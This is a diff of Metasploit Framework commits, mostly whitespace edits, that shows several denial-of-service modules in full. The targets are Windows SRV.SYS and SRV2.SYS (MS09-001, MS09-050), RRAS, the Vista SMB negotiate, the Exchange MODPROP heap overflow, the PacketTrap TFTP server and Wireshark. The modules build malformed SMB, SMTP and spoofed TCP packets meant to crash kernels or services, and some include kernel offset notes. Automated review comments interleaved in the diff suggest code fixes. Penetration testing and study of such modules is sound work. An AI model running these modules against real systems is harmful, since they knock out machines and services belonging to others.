'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
@ -43,12 +43,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[ 'OSVDB', '18830' ]
|
||||
]
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'browser']),
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
=begin
|
||||
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# Determine which pipe to use
|
||||
pipe = datastore['SMBPIPE']
|
||||
|
||||
|
||||
print_status("Connecting to the SMB service...")
|
||||
connect()
|
||||
smb_login()
|
||||
@ -91,12 +91,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
path = "HTREE\\ROOT" + ("\\" * i)
|
||||
|
||||
# 0 = nil, 1 = enum, 2/3 = services, 4 = enum (currentcontrolset|caps)
|
||||
|
||||
stubdata =
|
||||
|
||||
stubdata =
|
||||
NDR.long(rand(0xffffffff)) +
|
||||
NDR.wstring(path) +
|
||||
NDR.wstring(path) +
|
||||
NDR.long(4) +
|
||||
NDR.long(1) +
|
||||
NDR.long(1) +
|
||||
|
||||
print_status("Calling the vulnerable function...")
|
||||
|
||||
@ -111,8 +111,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
raise e
|
||||
end
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,17 +19,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SRV.SYS Mailslot Write Corruption',
|
||||
'Description' => %q{
|
||||
This module triggers a kernel pool corruption bug in SRV.SYS. Each
|
||||
call to the mailslot write function results in a two byte return value
|
||||
call to the mailslot write function results in a two byte return value
|
||||
being written into the response packet. The code which creates this packet
|
||||
fails to consider these two bytes in the allocation routine, resulting in
|
||||
a slow corruption of the kernel memory pool. These two bytes are almost
|
||||
a slow corruption of the kernel memory pool. These two bytes are almost
|
||||
always set to "\xff\xff" (a short integer with value of -1).
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
@ -48,12 +48,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'DefaultAction' => 'Attack',
|
||||
'DisclosureDate' => 'Jul 11 2006'
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('MAILSLOT', [ true, "The mailslot name to use", 'Alerter']),
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
# MAILSLOT: HydraLsServer
|
||||
@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
case action.name
|
||||
when 'Attack'
|
||||
|
||||
|
||||
print_status("Mangling the kernel, two bytes at a time...");
|
||||
|
||||
connect
|
||||
@ -84,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
rescue ::Exception => e
|
||||
|
||||
if (i == 1)
|
||||
if (i == 1)
|
||||
print_status("Failed to write any data to the mailslot: #{e}")
|
||||
break
|
||||
end
|
||||
@ -96,8 +96,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# Errors:
|
||||
# 0xc0000034 = object not found
|
||||
# 0xc0000205 = insufficient resources (too much data)
|
||||
|
||||
# 0xc0000205 = insufficient resources (too much data)
|
||||
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,14 +19,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SRV.SYS Pipe Transaction No Null',
|
||||
'Description' => %q{
|
||||
This module exploits a NULL pointer dereference flaw in the
|
||||
SRV.SYS driver of the Windows operating system. This bug was
|
||||
independently discovered by CORE Security and ISS.
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
['BID', '19215'],
|
||||
]
|
||||
))
|
||||
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
@ -52,11 +52,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
1.upto(5) do |i|
|
||||
print_status("Sending bad SMB transaction request #{i}...");
|
||||
self.simple.client.trans_nonull(
|
||||
"\\#{Rex::Text.rand_text_alphanumeric(rand(16)+1)}",
|
||||
'',
|
||||
Rex::Text.rand_text_alphanumeric(rand(16)+1),
|
||||
3,
|
||||
[1,0,1].pack('vvv'),
|
||||
"\\#{Rex::Text.rand_text_alphanumeric(rand(16)+1)}",
|
||||
'',
|
||||
Rex::Text.rand_text_alphanumeric(rand(16)+1),
|
||||
3,
|
||||
[1,0,1].pack('vvv'),
|
||||
true
|
||||
)
|
||||
end
|
||||
|
@ -1,10 +1,21 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::SMB
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SRV.SYS WriteAndX Invalid DataOffset',
|
||||
'Description' => %q{
|
||||
This module exploits a denial of service vulnerability in the
|
||||
@ -14,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' => [ 'j.v.vallejo[at]gmail.com' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
['MSB', 'MS09-001'],
|
||||
['OSVDB', '48153'],
|
||||
@ -49,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
pkt['Payload'].v['AccessMask'] = 0x2019f # Maximum Allowed
|
||||
pkt['Payload'].v['ShareAccess'] = 7
|
||||
pkt['Payload'].v['CreateOptions'] = 0x400040
|
||||
pkt['Payload'].v['Impersonation'] = 2
|
||||
pkt['Payload'].v['Impersonation'] = 2
|
||||
pkt['Payload'].v['Disposition'] = 1
|
||||
pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"
|
||||
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -15,7 +15,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',
|
||||
'Description' => %q{
|
||||
This module exploits an out of bounds function table dereference in the SMB
|
||||
@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2009-3103'],
|
||||
['BID', '36299'],
|
||||
@ -41,13 +41,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
Opt::RPORT(445),
|
||||
OptInt.new('OFFSET', [true, 'The function table offset to call', 0xffff])
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
connect()
|
||||
|
||||
|
||||
# The SMB 2 dialect must be there
|
||||
dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12', 'SMB 2.002']
|
||||
data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')
|
||||
@ -65,13 +65,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Sending request and waiting for a reply...")
|
||||
sock.put(pkt.to_s)
|
||||
r = sock.get_once
|
||||
|
||||
|
||||
if(not r)
|
||||
print_status("The target system has likely crashed")
|
||||
else
|
||||
print_status("Response received: #{r.inspect}")
|
||||
end
|
||||
|
||||
|
||||
disconnect()
|
||||
end
|
||||
|
||||
@ -95,11 +95,11 @@ end
|
||||
0x76 = ExAllocatePoolWithTag
|
||||
0x77 = ExFreePool
|
||||
0x86 = ExAllocatePoolWithTag
|
||||
0x87 = ExFreePoo
|
||||
0x87 = ExFreePoo
|
||||
0x96 = ExAllocatePoolWithTag
|
||||
0x97 = ExFreePoo
|
||||
0x97 = ExFreePoo
|
||||
0xa6 = ExAllocatePoolWithTag
|
||||
0xa7 = ExFreePoo
|
||||
0xa7 = ExFreePoo
|
||||
0xb9 = BugCheckEx
|
||||
0xc7 = SrvBalanceCredits
|
||||
0xdf = SrvNetStatistics data
|
||||
@ -114,10 +114,10 @@ end
|
||||
0x0179 = SrvProcessOplockBreakTimer
|
||||
0x0185 = L"XactSrv"
|
||||
0x01f8 = WppTraceCallback
|
||||
|
||||
|
||||
|
||||
|
||||
Offsets on Vista SP1 (no updates) x86:
|
||||
|
||||
|
||||
0x64 = mov esp, ebp; pop ebp, ret
|
||||
0xde = pool with tag
|
||||
|
||||
@ -154,6 +154,6 @@ end
|
||||
734 -> 802015ff - ffde03f078f8ff7f7c02f8ff3ffe01fe
|
||||
760 -> 99b4ff28 - 8bff558bec6a00ff7514ff7510ff750c
|
||||
804 -> 830ffc7d - 0000001722268b3e012004020010c01c
|
||||
|
||||
|
||||
|
||||
=end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -22,54 +22,54 @@ class Metasploit3 < Msf::Auxiliary
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference',
|
||||
'Description' => %q{
|
||||
This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing
|
||||
an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD.
|
||||
This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing
|
||||
an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD.
|
||||
Effecting Vista SP1/SP2 (And possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.
|
||||
},
|
||||
'Author' => [ 'sf' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2009-3103'],
|
||||
[ 'OSVDB', '57799' ],
|
||||
[ 'MSB', 'MS09-050' ],
|
||||
]
|
||||
))
|
||||
|
||||
|
||||
register_options( [ Opt::RPORT( 445 ) ], self.class )
|
||||
end
|
||||
|
||||
def run
|
||||
print_status( "Targeting host #{datastore['RHOST']}:#{datastore['RPORT']}..." )
|
||||
connect
|
||||
|
||||
|
||||
dialects = [ "AAAA" + [ 0xDEADC0DE ].pack( "V" ) + [ 0xCAFEF00D ].pack( "V" ), "SMB 2.002" ]
|
||||
|
||||
|
||||
data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join( '' )
|
||||
data += "A" * 128
|
||||
|
||||
|
||||
packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct
|
||||
|
||||
|
||||
packet['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE
|
||||
packet['Payload']['SMB'].v['Flags1'] = 0x18
|
||||
packet['Payload']['SMB'].v['Flags2'] = 0xC853
|
||||
packet['Payload']['SMB'].v['ProcessIDHigh'] = Rex::Proto::SMB::Constants::SMB2_OP_LOGOFF
|
||||
packet['Payload'].v['Payload'] = data
|
||||
|
||||
|
||||
packet = packet.to_s
|
||||
|
||||
|
||||
print_status( "Sending the exploit packet (#{packet.length} bytes)..." )
|
||||
sock.put( packet )
|
||||
|
||||
|
||||
response = sock.get_once
|
||||
|
||||
|
||||
if( not response )
|
||||
print_status( "No response. The target system has probably crashed." )
|
||||
else
|
||||
print_status( "Response received. The target system is not vulnerable:\n#{response.inspect}" )
|
||||
end
|
||||
|
||||
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -21,15 +21,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference',
|
||||
'Description' => %q{
|
||||
This module triggers a NULL dereference in svchost.exe on
|
||||
all current versions of Windows that run the RRAS service. This
|
||||
all current versions of Windows that run the RRAS service. This
|
||||
service is only accessible without authentication on Windows XP
|
||||
SP1 (using the SRVSVC pipe).
|
||||
SP1 (using the SRVSVC pipe).
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
@ -44,18 +44,18 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'DefaultAction' => 'Attack',
|
||||
'DisclosureDate' => 'Jun 14 2006'
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SMBPIPE', [ true, "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']),
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
connect
|
||||
smb_login
|
||||
|
||||
|
||||
case action.name
|
||||
when 'Attack'
|
||||
|
||||
@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
dcerpc_bind(handle)
|
||||
print_status("Bound to #{handle} ...")
|
||||
stb = [0, 0, 0, 0].pack('V*')
|
||||
|
||||
|
||||
print_status("Calling the vulnerable function...")
|
||||
begin
|
||||
dcerpc.call(0x0C, stb)
|
||||
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
raise e
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
@ -1,10 +1,9 @@
|
||||
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -16,19 +15,19 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft Vista SP0 SMB Negotiate Protocol DoS',
|
||||
'Description' => %q{
|
||||
This module exploits a flaw in Windows Vista that allows a remote
|
||||
unauthenticated attacker to disable the SMB service. This vulnerability
|
||||
was silently fixed in Microsoft Vista Service Pack 1.
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'
|
||||
))
|
||||
|
||||
|
||||
register_options([Opt::RPORT(445)], self.class)
|
||||
end
|
||||
|
||||
@ -38,11 +37,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# 100 requests ensure that the bug is reliably hit
|
||||
1.upto(100) do |i|
|
||||
|
||||
|
||||
begin
|
||||
|
||||
|
||||
connect
|
||||
|
||||
|
||||
# 118 dialects are needed to trigger a non-response
|
||||
dialects = ['NT LM 0.12'] * 118
|
||||
|
||||
@ -59,16 +58,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||
sock.put(pkt.to_s)
|
||||
|
||||
disconnect
|
||||
|
||||
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
|
||||
|
||||
rescue ::Exception
|
||||
print_status("Error at iteration #{i}: #{$!.class} #{$!}")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
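Review bot: The `rescue ::Exception` at the bottom of the `1.upto(100)` loop catches far more than socket failures — `SystemExit`, `NoMemoryError` and anything else the framework would want to see propagate — and the `rescue ::Interrupt` arm above it only carves out one of those; `rescue ::StandardError` already excludes Interrupt and SystemExit and is enough for the connection errors this loop is guarding against. The error path also does `print_status(...); return` without `disconnect`, so when `sock.put` raises after `connect` succeeded the socket for that iteration is simply abandoned; calling `disconnect` before the `return`, or moving it into an `ensure`, closes it. Whether the Tcp mixin's `disconnect` tolerates a nil socket when `connect` itself failed is not visible here, so confirm that before using `ensure`. The `run` method's header lies above the first hunk of this section.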
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,9 +17,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Smtp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'MS06-019 Exchange MODPROP Heap Overflow',
|
||||
'Description' => %q{
|
||||
This module triggers a heap overflow vulnerability in MS
|
||||
@ -42,23 +42,23 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[
|
||||
OptString.new('SUBJECT', [ true, 'The subject of the e-mail', 're: Your Brains'])
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
#
|
||||
# This needs some reworking to use the SMTPDeliver mixin and the Re::MIME class
|
||||
#
|
||||
def run
|
||||
|
||||
|
||||
connect_login
|
||||
|
||||
modprops = ['attendee', 'categories', 'class', 'created', 'description',
|
||||
'dtstamp', 'duration', 'last-modified',
|
||||
modprops = ['attendee', 'categories', 'class', 'created', 'description',
|
||||
'dtstamp', 'duration', 'last-modified',
|
||||
'location', 'organizer', 'priority', 'recurrence-id', 'sequence',
|
||||
'status', 'summary', 'transp', 'uid']
|
||||
|
||||
|
||||
#modprops = ['dtstamp']
|
||||
|
||||
|
||||
modpropshort = ""
|
||||
modpropbusted = ""
|
||||
modnum = rand(3)
|
||||
@ -79,14 +79,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
boundry = Rex::Text.rand_text_alphanumeric(8) + "." + Rex::Text.rand_text_alphanumeric(8)
|
||||
|
||||
|
||||
|
||||
# Really, the randomization above only crashes /sometimes/ - it's MUCH more
|
||||
# reliable, and gives crashes in better spots of you use these modprops:
|
||||
|
||||
modpropshort = "dtstamp,"
|
||||
modproplong = "dtstamp, dtstamp,"
|
||||
modpropbusted = "DTSTAMP:\r\n"
|
||||
|
||||
|
||||
mail = "From: #{datastore['MAILFROM']}\r\n"
|
||||
mail << "To: #{datastore['MAILTO']}\r\n"
|
||||
mail << "Subject: #{datastore['SUBJECT']}\r\n"
|
||||
@ -111,12 +111,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
mail << "END:VCALENDAR\r\n"
|
||||
mail << "\r\n--#{boundry}\r\n"
|
||||
mail << "\r\n.\r\n"
|
||||
|
||||
|
||||
print_status("Sending message...")
|
||||
|
||||
|
||||
print_status("Sending message...")
|
||||
sock.put(mail)
|
||||
sock.put("QUIT\r\n")
|
||||
print "<< " + sock.get_once
|
||||
print "<< " + sock.get_once
|
||||
disconnect
|
||||
end
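Review bot: `print "<< " + sock.get_once` immediately after `sock.put("QUIT\r\n")` raises `TypeError` whenever the server has already closed the connection or the read times out, because `get_once` returns nil in that case and nil cannot be concatenated to a String; the exception fires before `disconnect`, so the socket is left open as well. Use `resp = sock.get_once` followed by `print("<< #{resp}") if resp`, or guard the read so `disconnect` still runs. Nothing is read back between `sock.put(mail)` and the QUIT either, so a rejected DATA phase is only visible, if at all, in whatever the final read happens to return. The `run` method begins above this hunk.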
|
||||
|
||||
|
@ -3,10 +3,10 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Udp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'PacketTrap TFTP Server 2.2.5459.0 DoS',
|
||||
'Description' => %q{
|
||||
The PacketTrap TFTP server version 2.2.5459.0 can be
|
||||
|
@ -1,5 +1,9 @@
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -12,9 +16,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Capture
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Wireshark chunked_encoding_dissector function DOS',
|
||||
'Description' => %q{
|
||||
Wireshark crash when dissecting an HTTP chunked response.
|
||||
@ -28,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394'],
|
||||
],
|
||||
'DisclosureDate' => 'February 22 2007'))
|
||||
|
||||
|
||||
register_options([
|
||||
OptInt.new('SPORT', [true, 'The source port used to send the malicious HTTP response', 80]),
|
||||
OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil])
|
||||
@ -50,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
n.l3.protocol = 6
|
||||
n.l3.id = rand(0x10000)
|
||||
n.l3.ttl = 64
|
||||
|
||||
|
||||
n.l4 = Racket::L4::TCP.new
|
||||
n.l4.dst_port = rand(65535)+1
|
||||
n.l4.seq = rand(0x100000000)
|
||||
@ -60,11 +64,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
n.l4.src_port = datastore['SPORT'].to_i
|
||||
n.l4.window = 3072
|
||||
n.l4.payload = "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53
\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a"
|
||||
|
||||
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
|
||||
|
||||
|
||||
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
|
||||
|
||||
pkt = n.pack
|
||||
|
||||
|
||||
capture_sendto(pkt, rhost)
|
||||
|
||||
close_pcap
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
